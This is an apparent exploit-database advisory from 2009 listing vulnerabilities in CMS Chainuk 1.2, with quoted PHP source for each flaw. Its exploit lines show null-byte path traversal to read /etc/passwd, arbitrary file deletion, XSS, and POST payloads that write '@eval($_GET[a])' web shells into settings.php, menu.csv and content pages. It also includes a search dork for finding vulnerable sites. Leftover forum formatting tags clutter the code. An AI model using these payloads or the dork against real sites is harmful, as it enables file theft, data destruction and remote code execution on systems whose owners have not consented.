CMS chainuk 1.2 - Multiple Vulnerabilities


Author:

eLwaux

Type:

webapps

Platform:

PHP

Published:

2009-07-01

CMS Chainuk <= v.1.2 Vulns
Home: Cms.tut.su
Dork: "Cms.tut.su, 2009 g."

eLwaux(c) 14.06.2


## ## ## ## ## ##

LFI
/index.php
---------------------------------------------------------------------------
6:   if (isset($_GET ['id']))
7:   {
8:   [color=white]$id = $_GET ['id'];[/color]
9:   }
10:  else
11:  {
12:   $id = $index;
13:  }
14:  if (file_exists ("content/" . $id . ".php"))
15:  {
16:   [color=white]include ("content/" . $id . ".php");[/color]
17:  }
18:  else
19:  {
20:   include ('404.html'); exit;
21:  }
--------------------------------------------------------------------------

exploit:
     index.php?id=../../../../etc/passwd%00


## ## ## ## ## ##

LFI
/admin/admin_edit.php
---------------------------------------------------------------------------
2:   if (isset($_GET['id']))
3:   {
4:   [color=white]$id = $_GET['id'];[/color]
5:   if (!file_exists("../content/" . $id . ".php")) die ("..");
6:   [color=white]include("../content/" . $id . ".php");[/color]
23:  }
-----------------------------------------------------------------------------

exploit:
    index.php?id=../../../../etc/passwd%00


## ## ## ## ## ##

delete any files ()
/admin/admin_delete.php[
---------------------------------------------------------------------------
3:  if([color=white]unlink('../content/'.$_GET['id'].'.php')[/color])
4:  {
5:  echo 'Page '.$_GET['id'].' deleted';[/code]
-----------------------------------------------------------------------------

exploit:
   /admin/admin_delete.php?id=../FILE.PHP%00


## ## ## ## ## ##

LFI / XSS / Shell
/admin/admin_menu.php
-----------------------------------------------------------------------------
37:  $menu = explode (',', $_POST['menu']);
38:  $csvcont ='';
39:  foreach ($menu as $a)
40:  {
41:   if (!preg_match("/[0-9]/", $a)) die ("error");
42:   if (!file_exists("../content/" . $a . ".php")) die ("error");
43:   [color=white]include ("../content/" . $a . ".php");[/color]
44:   $csvcont = $csvcont . $a . ";" . $page_4menu . "\n";
45:  }
65:  if (!file_put_contents("../menu.csv", $csvcont)) ..
-----------------------------------------------------------------------------

exploits:
    LFI POST: menu=../1/../FILE.PHP%00,1,2,3,4,5,6,7
    XSS POST: menu=../1../onmousemove="javascript:alert(document.cookies)">>/../index;,1,2,3,4,5,6,7
    Shell: if <asp_tags: On> POST: menu=../1
<asp=@eval(\$_GET[a]);asp>/../admin/passw,1,2,3,4,5,6,7
                                 /?id=../menu.csv%00&a=phpinfo();[/CoDE]


## ## ## ## ## ##

Shell
/admin_settings.php
-----------------------------------------------------------------------------
39:  if (!isset($_POST['tmpl']) || !isset($_POST['id']) ||
!isset($_POST['menu']))
40:  {
41:   die ("...");
42:  }
43:  if (!file_exists("../templates/" . $_POST['tmpl'] .
"/index.php")) die ("...");
44:  if (!file_exists("../content/" . $_POST['id'] . ".php")) die ("...");
45:  $mtpl = $_POST['menu'];
46:  $set = "<? \$curr_tmpl='" . $_POST['tmpl'] . "'; \$index="=
$_POST['id'] . "; \$menu_tmpl = \"" . $mtpl . "\"; ?>";
63:  if (!file_put_contents("../settings.php", $set)
-----------------------------------------------------------------------------

exploit:
   POST: action=abc
                tmpl=default
                id=1
                menu=%TITLE%"; @eval($_GET["a"]); ?> //[/code]
Shell: /settings.php?a=phpinfo();


## ## ## ## ## ##

Shell
/admin_new.php
-----------------------------------------------------------------------------
POST: action=abc
            text=abc
            title='; @eval($_GET[a]); //
            descr=abc
            keys=abc
            link=abc[/code]
/content/=NUMBER.php?a=phpinfo();


## ## ## ## ## ##

Path Disclosure
       /index.php?id=../admin/passw
       /admin/admin_delete.php?id=thisf0ld3risn0texi5s5

# milw0rm.com [2009-07-01]